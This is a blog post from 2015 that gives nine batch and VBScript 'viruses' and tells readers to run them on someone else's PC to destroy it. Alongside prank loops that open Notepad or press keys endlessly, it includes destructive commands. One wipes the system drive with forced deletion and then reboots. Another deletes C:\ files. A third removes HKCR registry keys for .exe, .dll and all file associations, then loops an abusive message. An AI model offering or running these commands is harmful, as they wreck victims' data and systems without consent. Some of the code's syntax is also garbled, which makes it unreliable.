Monday, June 8, 2015

How to Create 09 viruses that will destroy a computer ?

Computer virus making programs are getting popularity now a days,It's mostly used for pranking friends or destroying someones datas or pc ,All the codes are mentioned below,USE IT IN YOUR OWN RISK.

1. CREATE A TEXT DOCUMENT AND ENTER THE CODES TO IT
2.SAVE THE FILE AS ".bat"  FORMAT (If it does not work save the file as ".vbs" format)
3.THIS VIRUS WILL START WORKING IF YOU OPEN THAT SAVED FILE,SO TO DESTROY SOMEONES PC,SIMPLY COPY THE FILE AND PASTE IT TO HIS PC AND RUN::::::
now,the ...::::BOOM:::......  happens


1)  ENDLESS NOTEPAD
       CODE:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


2) ENDLESS ENTER
      CODE:

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”

loop

3) SIMPLE VIRUS TO CRASH  A PC
     CODE:

   @Echo off
     Del C:\ *.* |y

4) ENDLESS BACKSPACE
     CODE:

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

5) CRAZY CAPS LOCK
    CODE:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

6) DELETES ALL FILES IN A DRIVE (xXx)
    CODE:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


7) DISCO  KEYBOARD LIGHTS  (num:7 & 8 has to be saved in .vbs format)( to terminate 
    CODE:
(num:7 & 8 has to be saved in .vbs format .To terminate  run task manager then,under "process" end "wscript.exe)


Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

8) DISCO CHAIN LIGHT
    CODE:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

9) DELETE KEY REGISTRY FILES ( This one is dangerous xxXxx)
    CODE:

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  FUCK OFF.
GOTO MESSAGE






No comments:

Post a Comment